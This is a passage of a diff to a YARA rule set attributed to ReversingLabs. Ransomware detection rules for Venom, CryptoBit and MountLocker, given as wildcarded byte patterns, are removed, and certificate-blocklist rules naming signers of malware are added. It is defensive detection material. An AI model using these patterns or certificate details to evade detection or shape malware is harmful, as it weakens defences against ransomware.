8B F0 8B FB B9 ?? ?? ?? ?? F3 A5 E9 ?? ?? ?? ?? 5D 5F 5E 5B C3 A3 - } - $remote_connection_p1 = { - 55 8B EC 81 C4 ?? ?? ?? ?? 50 83 C4 ?? 53 56 33 DB 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? - ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 5D ?? 8B D9 89 55 ?? 89 - 45 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF - 30 64 89 20 8B C3 E8 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? 89 45 - ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 BE ?? ?? - ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 56 8D 95 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? - ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 8B 45 ?? 50 E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? - ?? 0F 84 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D 55 ?? B8 ?? ?? ?? - ?? E8 ?? ?? ?? ?? BE ?? ?? ?? ?? 6A ?? 56 6A ?? 6A ?? 6A ?? 8B 45 ?? E8 - } - $remote_connection_p2 = { - 50 8B 45 ?? E8 ?? ?? ?? ?? 50 8B 45 ?? 50 E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 0F 84 - ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 33 C9 B2 ?? A1 ?? ?? ?? ?? E8 - ?? ?? ?? ?? 89 45 ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D 95 ?? ?? ?? ?? B8 - ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? - ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D - 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? - ?? 8D 95 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 75 ?? 68 ?? - ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B 45 ?? - E8 ?? ?? ?? ?? 8B 45 ?? 8B 70 ?? 85 F6 74 ?? 83 EE ?? 8B 36 68 ?? ?? ?? ?? 56 8B 45 - ?? 8B 40 ?? E8 ?? ?? ?? ?? 50 8B 45 ?? 50 E8 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 8B - 45 ?? 50 E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? - 89 45 ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 EB ?? 83 7D ?? ?? 74 ?? 8D 95 ?? - ?? ?? ?? 8B 4D ?? 8B 45 ?? 8B 30 FF 56 ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? - ?? 50 8B 45 ?? 50 E8 ?? ?? ?? ?? 85 C0 75 ?? C6 85 ?? ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? - B9 ?? ?? ?? ?? 8B 45 ?? 8B 30 FF 56 ?? 8B C3 8B 55 ?? 8B 52 ?? E8 ?? ?? ?? ?? 33 C0 - 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? C3 E9 - } - condition: - uint16(0)==0x5A4D and ($find_files) and ($encrypt_files) and ( all of ($remote_connection_p*)) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Gidrokon LLC" and pe.signatures[i].serial=="76:0c:ef:38:6b:63:40:67:51:ae:83:a9:ea:e9:23:42" and 1601942400<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Venom : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_5C2625Fa836A64F4882C56Cc7A45F0Ed : INFO FILE { meta: - description = "Yara rule that detects Venom ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "72149ec2-888e-5bed-baf1-0ec44e48328e" - date = "2022-06-06" - modified = "2022-06-06" + id = "db968865-fb1e-57b5-8968-6510e83c02ac" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/ByteCode.MSIL.Ransomware.Venom.yara#L1-L68" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "5817ece6a1cc304835f7fc243c4cfdc3c7cacd2251a9ac294a6662b58d2552e8" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L15444-L15460" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "85e187684d62c33ef6f69323b837ef2d44facab8278b512d7bd6afd49eaed976" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "Venom" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $setup_env = { - 00 28 ?? ?? ?? ?? 0A 73 ?? ?? ?? ?? 0B 07 1F ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 07 1B - 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 07 1F ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 07 1F ?? 28 - ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 07 1F ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 00 07 6F ?? ?? - ?? ?? 13 ?? 2B ?? 12 ?? 28 ?? ?? ?? ?? 13 ?? 00 06 11 ?? 28 ?? ?? ?? ?? 00 00 12 ?? 28 - ?? ?? ?? ?? 2D ?? DE ?? 12 ?? FE 16 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 DC 72 ?? ?? ?? ?? 1F - ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 72 ?? ?? ?? ?? 1F ?? - 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 1F ?? 28 ?? ?? ?? ?? 72 - ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 72 ?? ?? ?? ?? 1F ?? 28 ?? ?? ?? ?? 72 ?? - ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 20 ?? ?? ?? ?? 8D ?? ?? ?? ?? 25 D0 ?? ?? ?? - ?? 28 ?? ?? ?? ?? 0C 72 ?? ?? ?? ?? 20 ?? ?? ?? ?? 19 7E ?? ?? ?? ?? 19 16 7E ?? ?? ?? - ?? 28 ?? ?? ?? ?? 0D 09 08 20 ?? ?? ?? ?? 12 ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 17 28 - ?? ?? ?? ?? 00 2A - } - $find_files = { - 00 00 00 03 28 ?? ?? ?? ?? 0A 16 0B 2B ?? 06 07 9A 0C 00 00 08 72 ?? ?? ?? ?? 6F ?? ?? - ?? ?? 16 FE 01 0D 09 2C ?? 00 08 02 28 ?? ?? ?? ?? 00 00 00 DE ?? 26 00 00 DE ?? 00 07 - 17 58 0B 07 06 8E 69 32 ?? 00 03 28 ?? ?? ?? ?? 13 ?? 16 13 ?? 2B ?? 11 ?? 11 ?? 9A 13 - ?? 00 11 ?? 02 28 ?? ?? ?? ?? 00 00 11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E 69 32 ?? 00 DE ?? - 26 00 00 DE ?? 2A - } - $encrypt_files = { - 00 28 ?? ?? ?? ?? 0A 28 ?? ?? ?? ?? 03 6F ?? ?? ?? ?? 0B 02 72 ?? ?? ?? ?? 28 ?? ?? ?? - ?? 18 73 ?? ?? ?? ?? 0C 73 ?? ?? ?? ?? 0D 09 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 09 20 ?? - ?? ?? ?? 6F ?? ?? ?? ?? 00 09 18 6F ?? ?? ?? ?? 00 07 06 20 ?? ?? ?? ?? 73 ?? ?? ?? ?? - 13 ?? 09 11 ?? 09 6F ?? ?? ?? ?? 1E 5B 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 09 11 ?? 09 6F - ?? ?? ?? ?? 1E 5B 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 09 17 6F ?? ?? ?? ?? 00 08 06 16 06 - 8E 69 6F ?? ?? ?? ?? 00 08 09 6F ?? ?? ?? ?? 17 73 ?? ?? ?? ?? 13 ?? 02 19 73 ?? ?? ?? - ?? 13 ?? 20 ?? ?? ?? ?? 8D ?? ?? ?? ?? 13 ?? 00 2B ?? 00 11 ?? 11 ?? 16 11 ?? 6F ?? ?? - ?? ?? 00 00 11 ?? 11 ?? 16 11 ?? 8E 69 6F ?? ?? ?? ?? 25 13 ?? 16 FE 02 13 ?? 11 ?? 2D - ?? 11 ?? 6F ?? ?? ?? ?? 00 00 DE ?? 13 ?? 00 11 ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 00 - DE ?? DE ?? 00 11 ?? 6F ?? ?? ?? ?? 00 08 6F ?? ?? ?? ?? 00 00 02 28 ?? ?? ?? ?? 00 00 - DE ?? 26 00 00 DE ?? 00 DC 2A - } - condition: - uint16(0)==0x5A4D and ($setup_env) and ($find_files) and ($encrypt_files) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Xin Zhou" and pe.signatures[i].serial=="5c:26:25:fa:83:6a:64:f4:88:2c:56:cc:7a:45:f0:ed" and 1474416000<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_Cryptobit : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_7Df6Fa580F84493C414Ee0E431086737 : INFO FILE { meta: - description = "Yara rule that detects CryptoBit ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "8566e516-9884-5b20-90c4-7ed38fa96999" - date = "2020-07-15" - modified = "2020-07-15" + id = "27afa64e-0c9e-58ca-a4e1-db97cde66427" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.CryptoBit.yara#L1-L113" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "ccc8a0f1c5e11211649992d0f2b309968c97b49f1c7359e62d622f364e117429" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L15462-L15478" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "ef244587c9eb1e1cb2f8a9c161e5dd9ff70e9764586f16e011334400ee400ed9" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "CryptoBit" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $encrypt_files_p1 = { - 55 8B EC 83 C4 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 83 - 7D ?? ?? 75 ?? FF 75 ?? EB ?? 6A ?? 59 83 C9 ?? 83 F1 ?? 89 4D ?? 6A ?? 6A ?? 6A ?? - 6A ?? 6A ?? FF 75 ?? E8 ?? ?? ?? ?? 0B C0 0F 84 ?? ?? ?? ?? 89 45 ?? 60 BE ?? ?? ?? - ?? 56 64 FF 35 ?? ?? ?? ?? 64 89 25 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 33 D2 - 8B 0D ?? ?? ?? ?? F7 F1 0B C0 74 ?? FF 35 ?? ?? ?? ?? EB ?? 52 8B 0C 24 29 4D ?? 51 - FF 75 ?? 6A ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 59 0B C0 74 ?? 89 45 ?? 51 FF - 75 ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 75 ?? 83 7D ?? ?? 75 ?? 89 45 ?? 89 4D ?? FF 75 ?? - E8 ?? ?? ?? ?? EB ?? EB ?? 83 7D ?? ?? 75 ?? C7 45 ?? ?? ?? ?? ?? EB ?? A1 ?? ?? ?? - ?? 01 45 ?? EB ?? EB ?? 8B 64 24 ?? 64 8F 05 ?? ?? ?? ?? 83 C4 ?? 61 EB ?? EB ?? 64 - 8F 05 ?? ?? ?? ?? 83 C4 ?? FF 75 ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? 8B 45 ?? 8B 4D - ?? EB ?? 8B 45 ?? C9 C2 - } - $encrypt_files_p2 = { - 55 8B EC 83 C4 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 6A - ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? - ?? ?? ?? 89 45 ?? 8D 45 ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 83 F8 ?? 75 ?? E8 ?? ?? ?? ?? - 0B C0 74 ?? E9 ?? ?? ?? ?? 89 45 ?? 8B 15 ?? ?? ?? ?? 8B 4D ?? 0B C9 75 ?? 83 F8 ?? - 73 ?? E9 ?? ?? ?? ?? EB ?? 0B C9 75 ?? 3B C2 73 ?? 50 EB ?? 52 8F 45 ?? 83 7D ?? ?? - 75 ?? A1 ?? ?? ?? ?? 39 45 ?? 72 ?? FF 75 ?? FF 75 ?? FF 75 ?? FF 75 ?? E8 ?? ?? ?? - ?? 89 45 ?? 0B C0 74 ?? 6A ?? 50 51 FF 75 ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 6A ?? 6A - ?? 6A ?? 6A ?? 6A ?? FF 75 ?? E8 ?? ?? ?? ?? 0B C0 74 ?? 89 45 ?? 60 BE ?? ?? ?? ?? - 56 64 FF 35 ?? ?? ?? ?? 64 89 25 ?? ?? ?? ?? FF 75 ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? FF - 75 ?? E8 ?? ?? ?? ?? 0B C0 74 ?? 50 8B 4D ?? 8B 04 24 83 C9 ?? 83 F1 ?? 51 50 E8 ?? - ?? ?? ?? 89 45 ?? 0B C0 74 ?? 6A ?? 50 51 FF 75 ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? EB - ?? 8B 64 24 ?? 64 8F 05 ?? ?? ?? ?? 83 C4 ?? 61 EB ?? EB ?? 64 8F 05 ?? ?? ?? ?? 83 - C4 ?? 83 7D ?? ?? 74 ?? FF 75 ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? FF 75 ?? E8 ?? ?? - ?? ?? 83 7D ?? ?? 74 ?? 8B 45 ?? 8B 4D ?? EB ?? 33 C0 33 C9 C9 C2 - } - $find_files_p1 = { - 55 8B EC 83 C4 ?? 57 56 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? - ?? C7 45 ?? ?? ?? ?? ?? 8B 75 ?? 83 7E ?? ?? 75 ?? E8 ?? ?? ?? ?? 50 8D 46 ?? 50 E8 - ?? ?? ?? ?? 23 C0 0F 84 ?? ?? ?? ?? EB ?? 83 7E ?? ?? 75 ?? FF 35 ?? ?? ?? ?? 8D 46 - ?? 50 E8 ?? ?? ?? ?? 23 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 23 C0 0F - 84 ?? ?? ?? ?? 89 45 ?? B9 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 23 C0 0F 84 ?? - ?? ?? ?? 89 45 ?? 8B 75 ?? 8B 7D ?? 68 ?? ?? ?? ?? 57 56 E8 ?? ?? ?? ?? 8D 57 ?? 8B - 47 ?? D1 E0 C7 04 10 ?? ?? ?? ?? C6 44 10 ?? ?? FF 75 ?? 8D 47 ?? 50 E8 ?? ?? ?? ?? - 83 F8 ?? 0F 84 ?? ?? ?? ?? 89 45 ?? 8B 55 ?? 8B 75 ?? 8B 7D ?? 8B 02 25 ?? ?? ?? ?? - 0F 85 ?? ?? ?? ?? 8B 02 83 E0 ?? 0F 85 ?? ?? ?? ?? 8B 02 83 E0 ?? F7 02 ?? ?? ?? ?? - 0F 85 ?? ?? ?? ?? 8D 47 ?? 50 8D 46 ?? 50 E8 ?? ?? ?? ?? 8B 55 ?? 8D 42 ?? 50 8D 47 - ?? 50 E8 ?? ?? ?? ?? 8D 47 ?? 50 E8 ?? ?? ?? ?? 8B 55 ?? 89 47 ?? F7 02 ?? ?? ?? ?? - 74 ?? 68 ?? ?? ?? ?? 8D 47 ?? 50 E8 ?? ?? ?? ?? FF 77 ?? 8D 47 ?? 50 E8 ?? ?? ?? ?? - 83 F8 ?? 74 ?? 83 F8 ?? 75 ?? 48 50 FF 76 ?? 8D 47 ?? 50 E8 ?? ?? ?? ?? 0B C0 75 - } - $find_files_p2 = { - 0B C9 74 ?? FF 45 ?? E9 ?? ?? ?? ?? 83 7A ?? ?? 0F 84 ?? ?? ?? ?? 81 7A ?? ?? ?? ?? - ?? 0F 84 ?? ?? ?? ?? F7 02 ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? F7 02 ?? ?? ?? ?? 0F 85 ?? - ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 0B C0 74 ?? 8B F8 FF 76 ?? 8F 47 ?? FF 76 ?? - 8F 47 ?? FF 36 8F 07 8D 47 ?? 50 8D 46 ?? 50 E8 ?? ?? ?? ?? 8B 55 ?? 8D 42 ?? 50 8D - 47 ?? 50 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 47 ?? 50 E8 ?? ?? ?? ?? 8D 47 ?? 50 E8 ?? - ?? ?? ?? 89 47 ?? 83 3F ?? 75 ?? 57 68 ?? ?? ?? ?? FF 76 ?? E8 ?? ?? ?? ?? 0B C0 75 - ?? 57 E8 ?? ?? ?? ?? EB ?? 57 E8 ?? ?? ?? ?? EB ?? E9 ?? ?? ?? ?? FF 75 ?? FF 75 ?? - E8 ?? ?? ?? ?? 0B C0 0F 85 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? - 8B 75 ?? 83 7D ?? ?? 74 ?? 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B - 14 24 51 50 52 8D 46 ?? 50 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? E8 ?? - ?? ?? ?? 50 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 D1 E1 8B 5C 24 ?? 51 50 53 8D 46 - ?? 50 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? FF 75 ?? E8 ?? - ?? ?? ?? 83 7D ?? ?? 74 ?? FF 75 ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? FF 75 ?? E8 ?? - ?? ?? ?? 8B 45 ?? 5E 5F C9 C2 - } - $remote_connection = { - 55 8B EC 81 C4 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? - ?? 6A ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? - 6A ?? E8 ?? ?? ?? ?? 23 C0 89 85 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A - ?? 6A ?? 6A ?? FF 75 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 0B C0 89 85 ?? ?? ?? ?? 0F - 84 ?? ?? ?? ?? 8D 5D ?? C7 03 ?? ?? ?? ?? C7 43 ?? ?? ?? ?? ?? FF 75 ?? 8D 85 ?? ?? - ?? ?? 50 E8 ?? ?? ?? ?? FF 75 ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? - ?? ?? 6A ?? 6A ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 8D 45 ?? 50 FF B5 ?? ?? ?? ?? E8 ?? ?? - ?? ?? 89 85 ?? ?? ?? ?? 83 F8 ?? 74 ?? 6A ?? 6A ?? 6A ?? 6A ?? FF B5 ?? ?? ?? ?? E8 - ?? ?? ?? ?? 23 C0 74 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 23 C0 89 85 ?? ?? ?? ?? 74 ?? - 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? - ?? FF B5 ?? ?? ?? ?? 0B C0 74 ?? 83 BD ?? ?? ?? ?? ?? 74 ?? C7 85 ?? ?? ?? ?? ?? ?? - ?? ?? EB ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 74 ?? - FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 74 ?? FF B5 ?? ?? ?? ?? E8 ?? - ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? - ?? C9 C2 - } + condition: + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Yu Bao" and pe.signatures[i].serial=="7d:f6:fa:58:0f:84:49:3c:41:4e:e0:e4:31:08:67:37" and 1477440000<=pe.signatures[i].not_after) +} +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_309D2E115F1Fe2993Ee2E063 : INFO FILE +{ + meta: + description = "Certificate used for digitally signing malware." + author = "ReversingLabs" + id = "7182f3f2-7b2a-5c29-b7a9-607feafbe570" + date = "2023-11-08" + modified = "2023-11-08" + reference = "ReversingLabs" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L15480-L15496" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "15fdb95fe5429cdc0263615c2b7c90d21f37b52954c5ce568c1293cd3a544730" + score = 75 + quality = 90 + tags = "INFO, FILE" + status = "RELEASED" + sharing = "TLP:WHITE" + category = "INFO" + importance = 25 condition: - uint16(0)==0x5A4D and ($remote_connection and ( all of ($find_files_p*)) and ( all of ($encrypt_files_p*))) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "VANKY TECHNOLOGY LIMITED" and pe.signatures[i].serial=="30:9d:2e:11:5f:1f:e2:99:3e:e2:e0:63" and 1467102525<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_Mountlocker : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_90E33C1068F54913315B6Ce9311141B9 : INFO FILE { meta: - description = "Yara rule that detects MountLocker ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "8ce7e5c4-9eca-5dd2-ab92-39b915900d72" - date = "2021-03-25" - modified = "2021-03-25" + id = "61c5d5ed-ca2c-5f71-893b-4c933b37fa27" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.MountLocker.yara#L1-L86" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "d203217c229d54802e96e19dc66d38ecb0443d19e0492efe337df471a99559dc" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L15498-L15516" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "4a97171c6dfaa8d249ab0be1ce264b596d266ff4697d869a4d1f90cc0e2c49b7" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "MountLocker" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $encrypt_files_p1 = { - 55 8B EC 83 E4 ?? 83 EC ?? 53 56 57 8B 3D ?? ?? ?? ?? 8B DA 8B F1 FF D7 89 44 24 ?? - 33 C0 50 68 ?? ?? ?? ?? 6A ?? 50 50 68 ?? ?? ?? ?? 56 89 54 24 ?? 89 44 24 ?? FF 15 - ?? ?? ?? ?? 89 44 24 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 8D 4C 24 ?? 51 50 FF 15 ?? ?? ?? - ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? FF 74 24 ?? FF 74 24 ?? 6A ?? 6A ?? FF 74 24 ?? FF - 15 ?? ?? ?? ?? 89 44 24 ?? 85 C0 0F 84 ?? ?? ?? ?? 33 C9 0F 31 89 44 8C ?? 41 83 F9 - ?? 72 ?? FF 75 ?? 8B D3 8D 4C 24 ?? E8 ?? ?? ?? ?? 89 44 24 ?? 59 85 C0 74 ?? 8D 4C - 24 ?? E8 ?? ?? ?? ?? 89 44 24 ?? 8B 7C 24 ?? 8B 44 24 ?? 89 7C 24 ?? 89 44 24 ?? 8B - 35 ?? ?? ?? ?? 8B DE 8B 15 ?? ?? ?? ?? 03 DF 8B CA 89 54 24 ?? 13 C8 BF ?? ?? ?? ?? - 8B C6 F0 0F C7 0F 8B 7C 24 ?? 3B C6 8B 44 24 ?? 75 ?? 3B 54 24 ?? 75 ?? FF 74 24 ?? - 8B 35 ?? ?? ?? ?? FF D6 FF 74 24 ?? FF D6 8B 3D ?? ?? ?? ?? FF D7 8B F8 8B C2 2B 7C - 24 ?? 89 7C 24 ?? 1B 44 24 ?? 89 44 24 ?? 75 ?? 85 FF 0F 84 ?? ?? ?? ?? 8B 35 ?? ?? - ?? ?? 8B DE 8B 15 ?? ?? ?? ?? 03 DF 8B CA 89 54 24 ?? 13 C8 BF ?? ?? ?? ?? 8B C6 F0 - 0F C7 0F 8B 7C 24 ?? 3B C6 8B 44 24 ?? 75 ?? 3B 54 24 ?? 75 ?? 50 57 FF 74 24 ?? FF - 74 24 ?? E8 ?? ?? ?? ?? 89 44 24 ?? 8B C2 81 E2 ?? ?? ?? ?? 25 ?? ?? ?? ?? 89 54 24 - ?? DF 6C 24 ?? 83 64 24 ?? ?? 89 44 24 ?? DF 6C 24 ?? D9 E0 DE C1 D9 5C 24 ?? D9 44 - 24 ?? D9 05 ?? ?? ?? ?? D8 D9 DF E0 F6 C4 ?? 7A ?? D9 1D ?? ?? ?? ?? EB ?? DD D8 8B - 44 24 ?? EB ?? 8B 44 24 ?? 85 C0 8B 35 ?? ?? ?? ?? 74 ?? 50 FF D6 FF 74 24 ?? FF D6 - 33 C0 5F 5E 5B 8B E5 5D C3 - } - $encrypt_files_p2 = { - 55 8B EC 83 EC ?? 53 56 57 33 FF 6A ?? 8B F7 5B 0F 31 6A ?? 89 86 ?? ?? ?? ?? FF 15 - ?? ?? ?? ?? 83 C6 ?? 3B F3 72 ?? 8B D3 B9 ?? ?? ?? ?? 8A 01 88 41 ?? 41 83 EA ?? 75 - ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 57 8D 45 ?? 89 5D ?? 50 89 7D ?? 89 7D ?? FF - 15 ?? ?? ?? ?? 85 C0 0F 84 ?? 